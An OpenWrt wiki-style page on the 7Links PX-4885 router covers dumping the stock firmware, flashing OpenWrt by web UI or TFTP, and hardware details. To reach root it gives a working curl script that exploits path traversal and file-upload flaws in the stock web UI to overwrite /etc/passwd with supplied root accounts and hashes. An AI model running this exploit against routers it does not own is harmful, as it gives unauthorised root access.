7Links PX-4885

A small battery-powered wireless router.

→ Install OpenWrt (generic explanation)

In case you want to be able to switch back to the stock firmware, you need to dump it before installing OpenWrt as the manufacturer doesn't provide a firmware image.

The stock firmware has a telnet daemon running. However in order to drop to a root shell, it requires authenticating as user hongxun with a default password I couldn't figure out.

Luckily, a flaw in the web UI allows us to overwrite the /etc/passwd file with one we provide and get a root shell.

Here are the steps to follow:

1. Reset the web UI username and password to admin/admin
2. Prepare a FAT or NTFS formatted USB stick. Avoid using a multi-card reader for that since it may cause part of the firmware to crash.
3. Create the files set_telnet_passwd.sh and passwd according to the two frames below. Save them in the same directory. Make sure set_telnet_password.sh has executable permission.
4. Plug the USB stick into the router's USB port and wait 5 seconds after the blue LED blinks 5 times. This is necessary for a successful exploit of the flaw.
5. Open a shell in the directory you just created the files and run the set_telnet_passwd.sh script. It should exit with a message like: curl: (52) Empty reply from server.
6. It it succeeded, you should be now able to telnet to the router and get a root shell using username admin and password admin.

#!/bin/sh

ROUTER_IP=${1:-192.168.169.1}

# Set the current directory.
curl "http://admin:admin@${ROUTER_IP}/wireless/yun.asp?/media/../etc?946685196" > /dev/null

# Remove the old passwd file.
curl -d "n/a" "http://${ROUTER_IP}/goform/upload_file_set?action=del_files&filenames=passwd|"

# And replace it with the patched one.
curl -F "file=@passwd;filename=passwd" http://${ROUTER_IP}/cgi-bin/upload_file.cgi > /dev/null

hongxun:ydh7SLkuJO1zE:0:0:Adminstrator:/:/bin/sh
admin:8hES/Pe0q4.Q2:0:0:Adminstrator:/:/bin/sh

Your USB media will likely be automounted as /media/sda1, so you should be able to dump a full flash image with the command:

cat /dev/mtd0ro > /media/sda1/px4885_stock_full_dump.img

The resulting file will contain a full image of the flash, with all the partitions.

If you want a firmware image directly flashable with sysupgrade or TFTP, run the command:

cat /dev/mtd6ro > /media/sda1/px4885_stock_firmware.img

IMPORTANT: Before unplugging the USB stick or switching the router off, run the umount /media/sda1 command to make sure all data was committed to disk.

The web UI of the stock firmware can be used to flash an OpenWrt image. However it will only accept to flash an image using an initramfs root filesystem. So if you want to be able to keep your configuration across reboots, you'll need to flash your device twice:

• Flash an initramfs OpenWrt image using the web UI of the stock firmware.
• Now the device runs OpenWrt, perform a sysupgrade with a squashfs OpenWrt image. See generic.sysupgrade.

Another way to flash your device is to put the bootloader in TFTP flashing mode. To enter this mode, use a thin object (a needle for instance) to press the push button inside the small hole in the corner to the right of the ethernet port, and power on the device. If the bootloader successfully entered TFTP flashing mode, the led should be steady blue. As the button is not in the axis of the hole, it can prove difficult to hold it pressed while moving the power switch at the same time.

In TFTP flashing mode, the bootloader will send TFTP requests on its ethernet interface. It will keep trying until succeeding at downloading the firmware image.

Note: The bootloader will not check the validity of the downloaded firmware image. However, even in the case you fed it with an image that won't boot, you should still be able to restart the device in TFTP flashing mode as the bootloader partition is left untouched.

Here are the information you need to know to setup a TFTP server and your network interface.

The Kernal.bin file fetched by the device from your TFTP server will be written directly into the firmware partition. It can be any valid Uboot image, and it obviously cannot be bigger than the size of the firmware partition (about 3.6 MiB).

The flashing process may take a couple minutes.

Once the bootloader has flashed the firmware, it will immediately attempt to boot it (the led will turn orange).

→ generic.sysupgrade

→ Basic configuration After flashing, proceed with this.
Set up your Internet connection, configure wireless, configure USB port, etc.

→ failsafe_and_factory_reset

→ hardware.button on howto use and configure the hardware button(s).

The PX-4885 only has one software-accessible hardware button, which is the hidden reset button. The battery button used to check the battery level is not hooked to any GPIO so it cannot be repurposed in software.

→ port.serial general information about the serial port, serial port cable, etc.

This device seems to have UART pins accessible through test pads on the board. I didn't test that thought.

→ port.jtag general information about the JTAG port, JTAG cable, etc.

→ generic.debrick

If you didn't erase your bootloader partition, you should still be able to boot into TFTP flashing mode and flash a new firmware image using this.

• The stock firmware claims to have only 16 MiB RAM while the RAM chip is actually a 32 MiB one. OpenWrt reports the RAM size correctly and can use the full 32 MiB of RAM. What a pleasant surprise!
• GPL source code (DE)
  NOTE: The GPL tarball provided by the manufacturer contains the Ralink SDK but not all the required software and assets to build the stock firmware image.